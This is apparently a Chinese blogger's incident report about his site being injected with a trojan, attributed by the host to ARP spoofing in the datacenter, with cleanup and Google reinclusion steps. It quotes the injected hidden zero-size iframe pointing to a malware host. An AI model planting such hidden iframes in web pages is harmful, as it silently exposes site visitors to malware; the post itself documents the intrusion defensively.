pp.900666木马入侵


感谢网友xfeng的提醒,googlefans.net的首页,../blog/,被植入以下代码:

< iframe src=http://pp.900666.com/c.htm width=0 height=0>
< iframe src=http://pp.900666.com/c.htm width=0 height=0>

经查看,在同一台服务器上运行的其它主页,像igowu.cn,igowu.cn/blog/均感染该木马,目前尚不知道该木马会有什么危害,stopbadware是我所知道的第一个麻烦。
我手动查找,逐个删除,然后按照google的邮件提醒操作。

“登录 https:/www.google.com/webmasters/sitemaps/reinclusion?hl=zh-CN,选择”请求重新加入”链接,添加您的网站. 请加注“反malware组”。”
等待google重新对我的网站进行评价。

google上能找到的该木马资料如下:
由于我们托管在电信idc中心机房的服务器所在的网段中有一台其它公司的服务器中了病毒,这台中病毒的电脑以arp欺骗形式欺骗同一网段中所有服务器的正确的网关地址,以至于通过错误网关地址出站的页面都被加入代码(这些代码实际上是不存在于我们服务器上的),现在我们已经解决了这个问题,由此给你带来的影响我们深表歉意,希望能给予我们更多的理解,我们将在今后更扎实的做好服务器安全工作。
http://bbs.51.la/archiver/tid-47637.html

之前说了,检查得那么仔细,被挂马,肯定不是我的网站程序问题,根本就是机房那边存在arp欺骗。今早上咨询网站(www.nnask.com)无法访问,估计就是服务器进行维护了,果然,1个多小时后,网站恢复正常,木马也没有了。
http://www.gxnote.com/?1/action_viewspace_itemid_4980.html

www.getbbs.com下属的某论坛被挂马分析(非完整版本),分析的比较详细的一篇文章
http://blog.sina.com.cn/u/56b798f80100087a

Google更多关于该病毒的内容>>


《“pp.900666木马入侵”》 有 1 条评论

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据